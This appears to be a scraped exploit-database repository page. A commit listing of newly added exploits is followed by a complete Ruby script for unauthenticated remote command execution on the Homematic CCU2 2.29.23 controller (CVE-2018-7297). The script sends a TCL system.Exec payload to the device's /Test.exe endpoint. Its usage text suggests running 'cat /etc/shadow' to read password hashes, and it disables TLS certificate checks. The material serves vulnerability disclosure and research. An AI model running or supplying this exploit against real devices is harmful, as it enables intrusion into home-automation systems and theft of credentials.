a13c4ea572
23 changes to exploits/shellcodes SysGauge 4.5.18 - Local Denial of Service Systematic SitAware - NVG Denial of Service Allok AVI DivX MPEG to DVD Converter 2.6.1217 - Buffer Overflow (SEH) Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow osTicket 1.10 - SQL Injection osTicket 1.10 - SQL Injection (PoC) Open-AuditIT Professional 2.1 - Cross-Site Request Forgery Homematic CCU2 2.29.23 - Arbitrary File Write MiniCMS 1.10 - Cross-Site Request Forgery WordPress Plugin Relevanssi 4.0.4 - Reflected Cross-Site Scripting WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection Homematic CCU2 2.29.23 - Remote Command Execution Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection Joomla! Component AcySMS 3.5.0 - CSV Macro Injection WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change osCommerce 2.3.4.1 - Remote Code Execution Tenda W316R Wireless Router 5.07.50 - Remote DNS Change D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit) Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
61 lines
No EOL
1.6 KiB
Ruby
Executable file
61 lines
No EOL
1.6 KiB
Ruby
Executable file
#!/usr/bin/ruby
|
|
|
|
# Exploit Title: Homematic CCU2 Remote Command Execution
|
|
# Date: 28-03-18
|
|
# Exploit Author: Patrick Muench, Gregor Kopf
|
|
# Vendor Homepage: http://www.eq-3.de
|
|
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
|
|
# Version: 2.29.23
|
|
# CVE : 2018-7297
|
|
|
|
# Description: http://atomic111.github.io/article/homematic-ccu2-remote-code-execution
|
|
|
|
require 'net/http'
|
|
require 'net/https'
|
|
require 'uri'
|
|
|
|
unless ARGV.length == 2
|
|
STDOUT.puts <<-EOF
|
|
Please provide url and the command, which is execute on the homematic
|
|
|
|
Usage:
|
|
execute_cmd.rb <ip.adress> <homematic command>
|
|
|
|
Example:
|
|
execute_cmd.rb https://192.168.1.1 "cat /etc/shadow"
|
|
|
|
or
|
|
|
|
execute_cmd.rb http://192.168.1.1 "cat /etc/shadow"
|
|
|
|
EOF
|
|
exit
|
|
end
|
|
|
|
# The first argument specifies the URL and if http or https is used
|
|
url = ARGV[0] + "/Test.exe"
|
|
|
|
# The second argument specifies the command which is executed via tcl interpreter
|
|
tcl_command = ARGV[1]
|
|
|
|
# define body content
|
|
body = "string stdout;string stderr;system.Exec(\"" << tcl_command << "\", &stdout, &stderr);WriteLine(stdout);"
|
|
|
|
# split uri to access it in a easier way
|
|
uri = URI.parse(url)
|
|
|
|
# define target connection, disabling certificate verification
|
|
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
|
|
|
|
# define post request
|
|
request = Net::HTTP::Post.new(uri.request_uri)
|
|
|
|
# define the request body
|
|
request.body = body
|
|
|
|
# send the request to the homematic ccu2
|
|
response = http.request(request)
|
|
|
|
# print response to cli
|
|
puts response.body
|
|
end |